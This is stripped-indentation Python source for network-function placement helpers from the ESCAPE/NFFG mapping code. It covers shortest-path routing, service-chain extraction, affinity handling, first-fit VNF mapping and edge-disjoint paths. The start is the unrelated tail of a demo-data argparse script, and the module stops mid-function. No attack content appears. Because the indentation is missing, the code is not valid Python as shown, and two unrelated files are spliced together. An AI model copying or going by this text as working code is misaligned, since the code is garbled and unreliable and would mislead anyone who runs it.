return 30
def get_check_policy_type(raw_check_policy_type):
return raw_check_policy_type
def get_check_type(raw_check_type):
return raw_check_type
def isnumeric(val):
try:
int(val)
except TypeError:
return False
except ValueError:
return False
else:
return True
def get_args():
parser = argparse.ArgumentParser(description='Generates demo data')
parser.add_argument('outfile',
help='output file to append to')
parser.add_argument('--version',
action='version',
version=__version__,
help='displays version number')
parser.add_argument('--long-help',
action='store_true',
help='Provides more verbose help')
parser.add_argument('--user-instance',
choices=['prod', 'prodfailover', 'staging', 'dev'],
required=True)
parser.add_argument('--user-db',
choices=['AssetUserEvents'],
required=True)
parser.add_argument('--dirname',
help='path to config files')
args = parser.parse_args()
if args.long_help:
print(__doc__)
sys.exit(0)
return args
if __name__ == '__main__':
sys.exit(main())
| |
# Copyright 2017 Balazs Nemeth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Collects miscellaneous functions to support the mapping algorithm.
Common source of providing a logging object and importing the NFFG library
for all algorithm files.
"""
import ast
import copy
import logging
from heapq import heappush, heappop
from itertools import count
import UnifyExceptionTypes as uet
from ServiceChains import EndToEndChain
try:
# runs when mapping files are called from ESCAPE
from escape.nffg_lib.nffg import NFFG, NFFGToolBox
except ImportError:
# runs when mapping repo is cloned individually, and NFFG lib is in a
# sibling directory. WARNING: circular import is not avoided by design.
import site
site.addsitedir('..')
from nffg_lib.nffg import NFFG, NFFGToolBox
# Basic logger for mapping
log = logging.getLogger("mapping")
# Default log level
# Change this constant to set logging level outside of ESCAPE
DEFAULT_LOG_LEVEL = logging.DEBUG
# print "effective level", log.getEffectiveLevel()
# print "log level", log.level
# ESCAPE uses INFO and DEBUG levels. The default level of a logger is WARNING.
if log.getEffectiveLevel() >= logging.WARNING:
# If the RootLogger is not configured, setup a basic config here
logging.basicConfig(format='%(levelname)s:%(name)s:%(message)s',
level=DEFAULT_LOG_LEVEL)
# value to be considered zero, when checking against division by zero
zero_float_value = 1e-8
class InfraIsNotAGoodCandidateForHosting(Exception):
pass
def shortestPathsBasedOnEdgeWeight (G, source, weight='weight', target=None,
cutoff=None, routing_criteria=None,
forbidden_links=None):
"""
Calculates shortest paths, and returns all link ID-s of that path.
Taken and modified from NetworkX source code,
the function originally 'was single_source_dijkstra',
now it returns the key edge data too.
If a weight doesn't exist let's be permissive and give it 0 weight.
:param routing_criteria: allows the usage of these nodes only
:type cutoff: float limit on path length to terminate
:type target: str target node ID
:type weight: str link weight string to be used
:type source: str source node ID
:param forbidden_links: links which cannot be used by the paths
"""
if source == target:
return {source: [source]}, {source: []}
push = heappush
pop = heappop
dist = {} # dictionary of final distances
paths = {source: [source]} # dictionary of paths
# dictionary of edge key lists of corresponding paths
edgekeys = {source: []}
selfweight = (getattr(G.node[source], weight, 0) if
G.node[source].type != 'SAP' else 0)
seen = {source: selfweight}
c = count()
fringe = [] # use heapq with (distance,label) tuples
push(fringe, (selfweight, next(c), source))
while fringe:
(d, _, v) = pop(fringe)
if v in dist:
continue # already searched this node.
dist[v] = d
if v == target:
break
# for ignore,w,edgedata in G.edges_iter(v,data=True):
# is about 30% slower than the following
edata = []
for w, keydata in G[v].items():
neighbourdata = []
if routing_criteria is not None:
if w not in routing_criteria:
continue
for k, dd in keydata.items():
if not hasattr(dd, weight):
raise uet.BadInputException(
"Link %s should have edge attribute %s" % (k, weight),
"Link %s is %s" % (k, dd))
if forbidden_links is not None:
if k in forbidden_links:
continue
neighbourdata.append((getattr(dd, weight), k))
if len(neighbourdata) > 0:
minweight, edgekey = min(neighbourdata, key=lambda t: t[0])
edata.append((w, edgekey, {weight: minweight}))
for w, ekey, edgedata in edata:
if G.node[w].type == 'SAP':
tempweight = 0
else:
tempweight = getattr(G.node[w], weight, 0)
vw_dist = dist[v] + tempweight + edgedata[weight]
if cutoff is not None:
if vw_dist > cutoff:
continue
if w in dist:
if vw_dist < dist[w]:
raise ValueError('Contradictory paths found:', 'negative weights?')
elif w not in seen or vw_dist < seen[w]:
seen[w] = vw_dist
push(fringe, (vw_dist, next(c), w))
paths[w] = paths[v] + [w]
edgekeys[w] = edgekeys[v] + [ekey]
log.debug("Calculated distances from %s based on %s: %s" %
(source, weight, dist))
return paths, edgekeys
def retrieveE2EServiceChainsFromEdgeReqs (request):
"""
Processes the service graph to retrieve the SC information and deletes the
corresponding EdgeReq links from the SG.
:param request: The service graph which contains EdgeReqs
:return: a list of SC-s in format used by Algorithm1
"""
chainlist = []
cid = 1
edgereqlist = []
for req in request.reqs:
edgereqlist.append(req)
request.del_edge(req.src, req.dst, req.id)
# construct chains from EdgeReqs
for req in edgereqlist:
if len(req.sg_path) == 1:
# then add it as linklocal req instead of E2E req
log.info("Interpreting one SGHop long EdgeReq (id: %s) as link "
"requirement on SGHop: %s." % (req.id, req.sg_path[0]))
reqlink = None
for sg_link in request.sg_hops:
if sg_link.id == req.sg_path[0]:
reqlink = sg_link
break
if reqlink is None:
log.warn("EdgeSGLink object not found for EdgeSGLink ID %s! "
"(maybe ID-s stored in EdgeReq.sg_path are not the "
"same type as EdgeSGLink ID-s?)")
if req.delay is not None:
setattr(reqlink, 'delay', req.delay)
if req.bandwidth is not None:
setattr(reqlink, 'bandwidth', req.bandwidth)
elif len(req.sg_path) == 0:
raise uet.BadInputException(
"If EdgeReq is given, it should specify which SGHop path does it "
"apply to", "Empty SGHop path was given to %s EdgeReq!" % req.id)
else:
try:
# if delay is None it is handled by the EndToEndChain constructor
chain = {'id': cid, 'link_ids': req.sg_path,
'bandwidth': req.bandwidth if req.bandwidth is not None else 0,
'delay': req.delay}
except AttributeError:
raise uet.BadInputException(
"EdgeReq attributes are: sg_path, bandwidth, delay",
"Missing attribute of EdgeReq")
# reconstruct NF path from EdgeSGLink path
nf_chain = []
for reqlinkid in req.sg_path:
# find EdgeSGLink object of 'reqlinkid'
reqlink = None
for sg_link in request.sg_hops:
if sg_link.id == reqlinkid:
reqlink = sg_link
break
else:
raise uet.BadInputException(
"Elements of EdgeReq.sg_path should be EdgeSGLink.id-s.",
"SG link %s couldn't be found in input request NFFG" % reqlinkid)
# add the source node id of the EdgeSGLink to NF path
nf_chain.append(reqlink.src.node.id)
# add the destination node id of the last EdgeSGLink to NF path
if reqlinkid == req.sg_path[-1]:
if reqlink.dst.node.id != req.dst.node.id:
raise uet.BadInputException(
"EdgeReq.sg_path should select a path between its two ends",
"Last NF (%s) of EdgeReq.sg_path and destination of EdgeReq ("
"%s) are not the same!" % (reqlink.dst.node.id, req.dst.node.id))
nf_chain.append(reqlink.dst.node.id)
# validate the beginning and ending of EdgeReq path
if reqlinkid == req.sg_path[0] and \
reqlink.src.node.id != req.src.node.id or \
reqlinkid == req.sg_path[-1] and \
reqlink.dst.node.id != req.dst.node.id:
raise uet.BadInputException(
"EdgeReq.sg_path should select a path between its two ends",
"First NF (%s) of EdgeReq.sg_path and source of EdgeReq (%s) are "
"not the same!" % (reqlink.src.node.id, req.src.node.id))
# check if it is not an E2E chain (link-wise requirements are already
# added to SGHops)
if request.network.node[nf_chain[0]].type != 'SAP' or\
request.network.node[nf_chain[-1]].type != 'SAP':
raise uet.BadInputException("All EdgeReqs should be between SAPs, not"
" E2E requirement paths are not supported yet",
"Path of EdgeReq is %s"%nf_chain)
chain['chain'] = nf_chain
cid += 1
chainlist.append(EndToEndChain(**chain))
return chainlist
def substituteMissingValues (net):
"""
Checks all resource parameters in the substrate network and substitutes the
missing ones with either infinity or zero depending on the resource type,
which means permissive behaviour. Modifies the input NFFG
:type net: :class:`NFFG`
:param net: substrate network NFFG to process
:return: the modified NFFG
"""
# if some resource value is not set (is None) then be permissive and set it
# to a comfortable value.
for respar in ('cpu', 'mem', 'storage', 'delay', 'bandwidth'):
for n in net.infras:
if n.resources[respar] is None:
if respar == 'delay':
log.warn("Resource parameter %s is not given in %s, "
"substituting with 0!" % (respar, n.id))
n.resources[respar] = 0
else:
log.warn("Resource parameter %s is not given in %s, "
"substituting with infinity!" % (respar, n.id))
n.resources[respar] = float("inf")
# If link res is None or doesn't exist, replace it with a neutral value.
for i, j, d in net.network.edges_iter(data=True):
if d.type == 'STATIC':
if getattr(d, 'delay', None) is None:
if d.src.node.type != 'SAP' and d.dst.node.type != 'SAP':
log.warn("Resource parameter delay is not given in link %s "
"substituting with zero!" % d.id)
setattr(d, 'delay', 0)
if getattr(d, 'bandwidth', None) is None:
if d.src.node.type != 'SAP' and d.dst.node.type != 'SAP':
log.warn("Resource parameter bandwidth is not given in link %s "
"substituting with infinity!" % d.id)
setattr(d, 'bandwidth', float("inf"))
return net
def purgeNFFGFromInfinityValues (nffg):
"""
Before running the algorithm, None values for resources were replaced by
Infinity value to ensure seamless mapping, in case of missing parameters.
These values should be set back to None to cooperate with surrounding layers.
(zero values do not cause errors, and they can't be placed back unabiguously)
:type nffg: NFFG object to purge.
"""
purge = False
for respar in ('cpu', 'mem', 'storage', 'bandwidth'):
for n in nffg.infras:
if hasattr(n.resources, respar):
if n.resources[respar] == float("inf"):
n.resources[respar] = None
purge = True
if purge:
log.info("Purging node resource data of output NFFG from Infinity "
"values was required.")
purge = False
for i, j, d in nffg.network.edges_iter(data=True):
if d.type == 'STATIC':
if hasattr(d, 'bandwidth'):
if d.bandwidth == float("inf"):
d.bandwidth = None
purge = True
if purge:
log.info("Purging link resource of output NFFG from Infinity values"
" was required.")
def _checkIfThereIsAnchorPoint(request):
"""
Checks if the request graph is connected to any SAP by any SGHop.
:return:
"""
for sg in request.sg_hops:
if sg.src.node.type == 'SAP' or sg.dst.node.type == 'SAP':
return True
return False
def _gatherConsumerProviderDictFromNFFG (nffg):
"""
Extracts the consumer and provider ports from an nffg (either request or
network) for later processing.
:param nffg:
:return:
"""
cons_prov_service_ids = {}
for node_id in nffg.network.nodes():
if nffg.network.node[node_id].type in ('SAP', 'NF'):
for p in nffg.network.node[node_id].ports:
if p.sap is not None:
if p.sap not in cons_prov_service_ids:
# tuple of lists of consumers and providers respectively
cons_prov_service_ids[p.sap] = ([], [])
if p.role == NFFG.PORT_ROLE_PROVIDER:
cons_prov_service_ids[p.sap][1].append(p)
if p.role == NFFG.PORT_ROLE_CONSUMER:
cons_prov_service_ids[p.sap][0].append(p)
# keep only the ones which has at least one provider or consumer port.
cons_prov_service_ids = dict(filter(lambda t:
len(t[1][0]) > 0 or len(t[1][1]) > 0,
cons_prov_service_ids.iteritems()))
log.debug("Consumer, provider VNF ports detected respectively: %s in NFFG %s"
%(cons_prov_service_ids, nffg.id))
return cons_prov_service_ids
def checkAndPrepareConsumerProviderSAPSetting(request, network):
"""
Checks if there is any consumers or porvider NF port in the request NFFG.
Raises exception if any unsupported status is found.
It is not allowed to have a provider and a consumer in the request for the
same SAP data (the providers and the consumers of a service should be mapped
in separate orchestrations). Proper handling of these would need more
sophisticated modifications in the backtracking procedure.
Raises BadInputException if this invalid setting is found.
In case there is not anchor point (connection to SAP) checks if there is an
anchor point provided by a unambiguously connectable consumer SAP.
:param request: NFFG object to process.
:return:
"""
request_cons_prov_dict = _gatherConsumerProviderDictFromNFFG(request)
network_cons_prov_dict = _gatherConsumerProviderDictFromNFFG(network)
for k, v in request_cons_prov_dict.iteritems():
# we filter for VNFs from the provider list, because SAPs can be mapped
# unambiguously anyway.
if len(v[0])>0 and len(filter(lambda port: port.node.type == 'NF', v[1]))>0:
raise uet.BadInputException(
"From one consumer-provider SAP service only consumers or only "
"providers should be present in the request VNFs",
"Service id %s has both consumers: %s and providers: %s" % (
k, v[0], v[1]))
if not _checkIfThereIsAnchorPoint(request):
log.info("Hanging service graph request detected, trying to find anchor "
"point based on consumer SAP mapping.")
only_one_consumer_in_req = list(filter(lambda t: len(t[1][0]) == 1,
request_cons_prov_dict.iteritems()))
if len(only_one_consumer_in_req) == 0:
raise uet.BadInputException("There should be a consumer SAP whose service "
"is not consumed anywhere else in the service "
"graph", "Couldn't find such consumer SAP")
elif len(only_one_consumer_in_req) > 1:
# map to only the consumer SAP ID-s
unique_consumer_sap_ids = map(lambda t: t[0], only_one_consumer_in_req)
# filter the unique consumer SAP ID-s which have only one provider.
unambiguously_mappable_consumers = list(filter(lambda t,
allowed=unique_consumer_sap_ids:
t[0] in allowed and len(t[1][1]) == 1,
network_cons_prov_dict.iteritems()))
if len(unambiguously_mappable_consumers) == 0:
raise uet.BadInputException("Among the unique consumer SAP IDs %s there"
" should be one which can be mapped "
"unambiguously"%unique_consumer_sap_ids,
"Provider SAPs in the network provide less "
"or more than one mapping possibilities for"
" each of them: %s"%network_cons_prov_dict)
elif len(unambiguously_mappable_consumers) > 1:
log.debug("There are more consumer SAPs which can be mapped "
"unambiguously: %s"%unambiguously_mappable_consumers)
for mappable_consumer_tup in unambiguously_mappable_consumers:
# key of the current unambiguously mappable element
anchoring_consumer_id = mappable_consumer_tup[0]
# NF of the first (there might be other) consumer port
anchor_point_nf = request_cons_prov_dict[
anchoring_consumer_id][0][0].node
log.debug("Introducing VNF %s as anchor point for the service graph "
"based on unambiguous mapping of consumer SAP %s"
%(anchor_point_nf.id, anchoring_consumer_id))
# map this NF based on first fit mapping, so during preprocessing
# this will be added as an already rechained starting point for subchain
# finding algorithm.
network = firstFitMapOneVNF(anchor_point_nf, network)
return network
def doesMappingComplyToSAPAliasCriteria(resource, infra_id, vnf, running_vnfs):
"""
Checks whether this vnf mapping complies to the SAP
alias criteria during the greedy process's current state when
running_or_mapped_vnfs are mapped to the same infra as we are checking for
vnf_id.
Returns true if there is no SAP alias criteria or if this mapping satisfies
it according to the current state.
# NOTE: this could return some metric, which could influance the objective
function value to make some ordering among the possibilites
:param infra_id: where we are checking to map vnf
:param resource: The nffg's networkx obejct which is maintained by the
mapping process (NFs are not there!)
:param vnf: the VNF to map to the same place where
:param running_vnfs: references to VNFs which mapped (earlier or
this orchestration) to the possible host of vnf
:return: bool
"""
provider_ports = []
consumer_port = None
for p in vnf.ports:
if p.role == NFFG.PORT_ROLE_PROVIDER and p.sap is not None:
provider_ports.append(p)
if p.role == NFFG.PORT_ROLE_CONSUMER and p.sap is not None:
if consumer_port is not None:
if consumer_port.sap != p.sap:
raise uet.BadInputException("A VNF should only consume one service",
"Consumer VNF %s has multiple SAP "
"consumers with different service %s and "
"%s" % (vnf.id, consumer_port.sap, p.sap))
consumer_port = p
if len(provider_ports) > 0:
log.debug("VNF %s has provider ports: %s"%(vnf.id, provider_ports))
if consumer_port is not None:
log.debug("VNF %s has consumer port: %s"% (vnf.id, consumer_port))
if len(provider_ports) > 0:
# we need to map a provider NF to the same Infra where a SAP is connected
# with the same SAP provider data
# INSTEAD: we can map sap provider anywhere!
# lets continue checking, consumer port criteria may spoil it.
pass
if consumer_port is not None:
# we need to map a consumer NF to the same Infra where there is an already
# mapped NF with this SAP service provider
for vnf_obj in running_vnfs:
for possible_provider_p in vnf_obj.ports:
if possible_provider_p.role == NFFG.PORT_ROLE_PROVIDER and \
possible_provider_p.sap == consumer_port.sap and \
possible_provider_p.sap is not None:
log.debug("VNF %s mapping to Infra %s complies to SAP consumer-"
"provider criteria because of provider VNF %s"
%(vnf.id, infra_id, vnf_obj.id))
return True
# OR where there is an appropriate SAP provider port on a SAP
for node_id in resource.neighbors_iter(infra_id):
node_obj = resource.node[node_id]
if node_obj.type == 'SAP':
for possible_provider_p in node_obj.ports:
if possible_provider_p.sap == consumer_port.sap and \
possible_provider_p.sap is not None:
log.debug("VNF %s mapping to Infra %s complies to SAP consumer-"
"provider criteria because of provider SAP %s"
%(vnf.id, infra_id, node_id))
return True
else:
return False
# There is no any Provider or Consumer SAP criteria here!
return True
def _addBackwardAffinityCriteria (nffg, nf_id, aaff_pair_id, aaff_id, aff_type):
"""
Adds a backward Anti-Affinity reference from one NF to another.
:param nffg: :class:`NFFG` to work on with the anti-affinity.
:param nf_id: NF ID containing the anti-affinity.
:param aaff_pair_id: NF ID which must be in affinity with the current NF
:param aaff_id: string of anti-affinity relation ID
:param aff_type: one of 'affinity' or 'antiaffinity'
:return: None
"""
if nf_id not in getattr(nffg.network.node[aaff_pair_id].constraints,
aff_type).itervalues():
log.debug("Add backward %s between VNFs %s and %s to "
"make it symmetric." % (aff_type, nf_id, aaff_pair_id))
getattr(nffg.network.node[aaff_pair_id].constraints,
aff_type)[aaff_id + "-back"] = nf_id
def makeAffinityCriteriaSymmetric (req, net):
"""
Checks all anti-affinity requirements and makes them symmetric so the greedy
mapping process would see the requirement from each direction. If the anti-
affinity pair is not in the request graph, but it is in the substrate NFFG,
then it is added to the request, so anti-affinity delegation could be resolved
in case of embedding failure due to the unresolvable anti-affinity.
These extra VNF-s are handled well as VNFs to be left in place both in terms
of vnf_mapping structure and substrate resource handling.
:param req: request graph to process
:param net: resource, which may contain mappend NFs in affinity relation
with requested NFs.
:return:
"""
for aff_type in ("affinity", "antiaffinity"):
for nf in req.nfs:
if len(getattr(nf.constraints, aff_type)) > 0:
for aaff_id, aaff_pair_id in \
getattr(nf.constraints, aff_type).iteritems():
if aaff_pair_id in req:
_addBackwardAffinityCriteria(req, nf.id, aaff_pair_id,
aaff_id, aff_type)
elif aaff_pair_id in net:
req.add_node(copy.deepcopy(net.network.node[aaff_pair_id]))
_addBackwardAffinityCriteria(req, nf.id, aaff_pair_id,
aaff_id, aff_type)
else:
raise uet.BadInputException("The %s should refer to a VNF "
"which is in the request graph or "
"mapped already in the "
"substrate graph" % aff_type,
"VNF %s not found for %s from %s"
" to %s" % (aff_type,
aaff_pair_id, nf.id, aaff_pair_id))
def processAllowedNodesConstraintToPlacementCriteria (nffg, substrate=None):
"""
Placement criteria is given in the form of constraint['allowed_nodes'] =
"('BisBiS1', 'BisBiS2', 'BisBis3')" (string format!). This function
processes this into NodeNF.placement_criteria for all NFs of the input NFFG.
:param substrate: If None, only infras from NFFG can be in placement_crit.
:param nffg:
:return:
"""
for nf in nffg.nfs:
placement_criteria = None
if nf.constraints.has_constraint('allowed_nodes'):
placement_criteria = ast.literal_eval(
nf.constraints.constraint['allowed_nodes'])
if nf.constraints.has_constraint('banned_nodes'):
if len([n for n in nffg.infras]) == 0 and substrate is None:
raise uet.InternalAlgorithmException(
"Banned nodes cannot be processed, because possible nodes are not "
"available!")
elif substrate is None:
nffg_to_search_allowed = nffg
else:
nffg_to_search_allowed = substrate
banned_nodes = ast.literal_eval(
nf.constraints.constraint['banned_nodes'])
if placement_criteria is None:
placement_criteria = []
else:
# we need to filter banned nodes from allowed nodes
placement_criteria = filter(lambda i, ban=banned_nodes: i not in ban,
placement_criteria)
for infra in nffg_to_search_allowed.infras:
if infra.id not in banned_nodes and infra.id not in placement_criteria:
placement_criteria.append(infra.id)
if placement_criteria is not None:
setattr(nf, 'placement_criteria', placement_criteria)
if len(nf.placement_criteria) == 0:
raise uet.BadInputException(
"The 'allowed nodes' constraint should give possilbe NF placements",
"'allowed_nodes' container for VNF %s in NFFG %s is empty!" %
(nf.id, nffg.id))
log.debug("Processed incoming placement criteria on VNF %s: %s"%
(nf.id, nf.placement_criteria))
# delete allowed nodes and banned nodes constraints, they are handled by
# placement criteria attribute and solved in the mapping.
nf.constraints.del_constraint('allowed_nodes')
nf.constraints.del_constraint('banned_nodes')
return nffg
def firstFitMapOneVNF (single_nf, net):
"""
Maps NF to the first Infra which is capable of hosting it.
:param single_nf NodeNF object to map.
:param net: substrate NFFG object to map the NF
:return:
"""
singe_nf_nffg = NFFG()
singe_nf_nffg.add_nf(nf=single_nf)
singe_nf_nffg = processAllowedNodesConstraintToPlacementCriteria(
singe_nf_nffg, substrate=net)
net.calculate_available_node_res()
for infra in net.infras:
for nf in singe_nf_nffg.nfs:
if nf.functional_type in infra.supported and infra.availres['mem'] >=\
nf.resources['mem'] and infra.availres['cpu'] >= nf.resources['cpu'] and\
infra.availres['storage'] >= nf.resources['storage'] and \
(infra.id in nf.placement_criteria or len(nf.placement_criteria) == 0):
# Check SAP alias mapping criteria too!
if not doesMappingComplyToSAPAliasCriteria(net.network, infra.id, nf,
[n for n in net.running_nfs(infra.id)]):
continue
# TODO: add DYNAMIC link connection to VNF should be refactored into
# separate function, this feature is also used in constructOutputNFFG a
# couple of times
net.add_nf(copy.deepcopy(nf))
for p in nf.ports:
nf_port = p
break
else:
nf_port = nf.add_port()
infra_port_id = "|".join((str(infra.id), str(nf.id), str(nf_port.id)))
try:
out_infra_port = net.network.node[infra.id].ports[infra_port_id]
log.debug("Port %s found in Infra %s leading to port %s of NF"
" %s." % (infra_port_id, infra.id, nf_port, nf.id))
except KeyError:
out_infra_port = net.network.node[infra.id].add_port(id=infra_port_id)
log.debug("Port %s added to Infra %s to NF %s."
% (out_infra_port.id, infra.id, nf.id))
log.debug("Mapped VNF %s based on first fit mapping to infra node %s"%
(single_nf.id, infra.id))
net.add_undirected_link(out_infra_port, nf_port, dynamic=True)
return net
else:
raise uet.BadInputException("Enough resources should be available in the "
"network for all NFs", "Not enough resources "
"found on any of the infras for VNF %s"%nf.id)
def genStartingEndingNodes(G, current_path, current_linkids):
"""
Returns the cutting points of the paths, where an alternative path shall
be inserted.
This impelemntation gives back every two ends of all links in the order of
the path.
:param G:
:param current_path:
:param current_linkids:
:return: starting cutting point, first link after,
last link before ending point, ending cutting point
"""
for i,j,k in zip(current_path[:-1], current_path[1:], current_linkids):
yield i, k, k, j
def getForbiddenLinks(start, end, current_path, current_linkids):
"""
Based on the given cutting point, identifies which links of the path should
be replaced.
This implementation returns the first link from the path between the endpoints.
:param start:
:param end:
:param current_path:
:param current_linkids:
:return:
"""
for i, j, k in zip(current_path[:-1], current_path[1:], current_linkids):
if i == start:
return [k]
def generateAlternativePaths(G, current_path, current_linkids,
weight='weight', routing_criteria=None,
max_path_cnt=3):
"""
Generates paths which are at least one link different from the given path.
All returned paths are between the starting and ending node of the given paths
NOTE: this may be refactored into a separate strategy class, where muliple
implementations could be provided for the interface of forbidden links and
starting ending nodes.
:param G: graph to generate the alternative paths on
:param current_path: node ID list of a path between source and target
:param current_linkids: link ID list of a path between source and target
:param max_path_cnt: max number of alternative paths returned
:param routing_criteria: list of useable nodes, None means all
:param weight: weight for path search
:return:
"""
if max_path_cnt > 0:
log.debug("Looking for at most %s path alternatives of %s, %s"%
(max_path_cnt, current_path, current_linkids))
alternative_paths = []
# get a starting and ending node of the original path
for start, start_link_id, end_link_id, end in genStartingEndingNodes(
G, current_path, current_linkids):
# forbid some of the links between the starting and ending node of the
# original path.
forbidden_links = getForbiddenLinks(start, end, current_path,
current_linkids)
path_dict, linkid_dict = shortestPathsBasedOnEdgeWeight(G, start,
weight=weight, target=end, routing_criteria=routing_criteria,
forbidden_links=forbidden_links)
if end in path_dict and end in linkid_dict:
# connect the starting and ending node with an alternative path
new_path = current_path[:current_path.index(start)]
new_path.extend(path_dict[end])
new_path.extend(current_path[current_path.index(end) + 1:])
new_linkids = current_linkids[:current_linkids.index(start_link_id)]
new_linkids.extend(linkid_dict[end])
new_linkids.extend(current_linkids[current_linkids.index(end_link_id) + 1:])
alternative_paths.append((new_path, new_linkids))
log.debug("Path alternative found on path %s, %s"%(new_path, new_linkids))
if len(alternative_paths) == max_path_cnt:
break
return alternative_paths
else:
return []
def shortest_edge_disjoint_paths(G, source, target, k=2, weight='weight',
node_id_separator_char='%'):
"""
Calculates k edge disjoint paths from source to target, which have minimal
total edge weight based on the given weighting key.
Raises exception if the problem is not feasible.
# TODO: Write comments obeying to NetworkX conventions, and submit it for
incorporating into the library.
Thanks for Torsten Tholey, Universitat Augsburg for the slides:
https://thiserver.informatik.uni-augsburg.de/personen/lei11.pdf
:param weight: key to use as edge weight.
:param source: source node ID
:param target: destination node ID
:param k: number of disjoint paths to look for
:param node_id_separator_char: used to concatenate and separate node IDs
:return: list of lists containing the shortest path ID-s
"""
import networkx as nx
# make some input checking, whether the problem is feasible.
if source == target:
raise nx.NetworkXUnfeasible("Source and target nodes must be different for "
"disjoint path finding.")
if nx.edge_connectivity(G, source, target) < k:
raise nx.NetworkXUnfeasible("There are no k=%s disjoint paths in the given "
"graph."%k)
# working graph which is a complete modifiable copy.
R = G.copy()
replaced_edges = {}
# cycles with length 2 must be replaced to make G antisymmetric
for i, j in G.edges_iter():
if G.has_edge(j, i):
for _ in xrange(0,2):
if R.has_edge(i, j):
tmp_node_id = node_id_separator_char.join((str(i), str(j)))
replaced_edges[(i, j)] = tmp_node_id
# replace i,j,key with a node and two edges.
R.remove_edge(i, j)
R.add_edge(i, tmp_node_id, attr_dict=G[i][j])
# make the 'weight' attribute of the second link artificially 0, so
# it won't interfere with the shortest path calculation!
R.add_edge(tmp_node_id, j)
R[tmp_node_id][j][weight] = 0
# make the same replacement on the opposite edge.
j, i = i, j
# stores the currently found disjoint path of G
disjoint_paths = []
while len(disjoint_paths) < k:
try:
dist_R, shortest_paths_R = nx.single_source_dijkstra(R, source,
weight=weight)
P = shortest_paths_R[target]
if len(disjoint_paths) > 0 and len(P) > 2:
path_pieces = {}
path_piece_key = 0
new_disjoint_paths = []
disjoint_piece_endings = [target] * len(disjoint_paths)
iterator_P = iter(zip(P[:-1], P[1:]))
i, j = next(iterator_P)
# we need to store that part of P, which connects disjoint_P-s
# first link, cannot be in any crossover part.
inter_disjoint_P_part_of_P = [i, j]
while j != target:
# initially all firstly found chain pieces end in target.
disjoint_paths_with_piece_endings = zip(disjoint_paths,
disjoint_piece_endings)
disjoint_piece_endings = []
# either we are on a crossover track or between disjoint paths.
during_crossover = False
i, j = next(iterator_P)
# disjoint_paths list always contains paths directed according to
# the original G
for disjoint_P, piece_ending in disjoint_paths_with_piece_endings:
during_crossover = False
# we need to iterate on the edges of disjoint_P from the target
disjoint_P_not_yet_processed_part = disjoint_P[:disjoint_P.
index(piece_ending) + 1]
edges_of_disjoint_P = zip(disjoint_P_not_yet_processed_part[:-1],
disjoint_P_not_yet_processed_part[1:])
edges_of_disjoint_P.reverse()
for crossover_i, crossover_j in edges_of_disjoint_P:
if not during_crossover and crossover_i == j and crossover_j == i:
# here a new crossover has just started, we were coming on P
# for a while and the remaining part of this disjoint_P can
# be concatenated.
# NOTE: if this is the very first crossover, then new_piece is
# already the first disjoint path!
new_piece = inter_disjoint_P_part_of_P
new_piece.extend(disjoint_P_not_yet_processed_part[
disjoint_P_not_yet_processed_part.
index(crossover_j) + 1:])
path_pieces[path_piece_key] = new_piece
path_piece_key += 1
during_crossover = True
i, j = next(iterator_P)
elif during_crossover and crossover_i == j and crossover_j == i:
# this part needs to be discarded, we are during a crossover
i, j = next(iterator_P)
elif during_crossover and crossover_i != j and crossover_j == i:
# we are leaving the crossover part
disjoint_piece_endings.append(crossover_j)
# we are now between disjoint_P-s, there is at least one edge
# between them. at least this link is part of the inter
# disjoint path part of P
inter_disjoint_P_part_of_P = [i, j]
if j != target:
i, j = next(iterator_P)
during_crossover = False
# we continue to look for other crossovers with other disjoint_P
break
else:
# piece_ending stays the current piece_ending, if we didn't cross
# over this disjoint_P.
disjoint_piece_endings.append(piece_ending)
# if now crossover was not detected, (i, j) still stay the same
# for the other disjoint_P-s.
if not during_crossover:
# we are between disjoint_P-s and we didn't manage to
# find a crossover
inter_disjoint_P_part_of_P.append(j)
# this is the last part of P, which hasn't crossed over any disjoint_P-s
path_pieces[path_piece_key] = inter_disjoint_P_part_of_P
path_piece_key += 1
# we need this remaining beginnings of the disjoint_P-s too.
for disjoint_P, piece_ending in zip(disjoint_paths,
disjoint_piece_endings):
path_pieces[path_piece_key] = disjoint_P[:disjoint_P.
index(piece_ending) + 1]
path_piece_key += 1
# we need to pair up the path pieces to construct the new disjoint_paths
# There is exactly one continuation for all of the path pieces.
while len(path_pieces) > 0:
path_piece_key_to_del = []
path_piece_to_add = []
for k1, first_path_piece in path_pieces.iteritems():
if first_path_piece[0] == source and first_path_piece[-1] == target:
new_disjoint_paths.append(first_path_piece)
path_piece_key_to_del.append(k1)
break
elif first_path_piece[0] == source:
for k2, second_path_piece in path_pieces.iteritems():
if first_path_piece[-1] == second_path_piece[0]:
new_longer_piece = first_path_piece
path_piece_key_to_del.append(k1)
path_piece_key_to_del.append(k2)
new_longer_piece.extend(second_path_piece[1:])
if new_longer_piece[-1] == target:
new_disjoint_paths.append(new_longer_piece)
else:
path_piece_to_add.append(new_longer_piece)
break
elif first_path_piece[0] == first_path_piece[-1]:
# some path pieces can be discarded.
path_piece_key_to_del.append(k1)
break
# execute the changes on path pieces.
for key in path_piece_key_to_del:
del path_pieces[key]
for longer_piece in path_piece_to_add:
path_pieces[path_piece_key] = longer_piece
path_piece_key += 1
# the number of disjoint paths has increased by one!
disjoint_paths = new_disjoint_paths
else:
disjoint_paths.append(P)
# create new edge weights
for i, j, data in R.edges_iter(data=True):
try:
data[weight] = data[weight] + dist_R[i] - dist_R[j]
except KeyError:
continue
# reverse the edges on the shortest path, keeping the new edge weights
for i, j in zip(P[:-1], P[1:]):
R.add_edge(j, i, attr_dict=R[i][j])
R.remove_edge(i, j)
# at this point, the disjoint_paths list must always contains correct
# paths of G, except the temporarily added nodes can still be there.
except nx.NetworkXNoPath:
raise nx.NetworkXAlgorithmError(
"k=%s disjoint paths haven't been found, while the edge connectivity of"
" the graph is %s" % (k, nx.edge_connectivity(G, source, target)))
# simply remove the temporarily added nodes from the disjoint paths
tmp_node_filtered_disjoint_paths = []
for disjoint_P in disjoint_paths:
filtered_path = filter(lambda n, to_filter=replaced_edges.values():
n not in to_filter, disjoint_P)
# it can happen that the additional nodes introduce unnecessary cycles
# into the disjoint paths, which can be removed (edge weights are positive,
# and paths stay disjoint)
to_cut = []
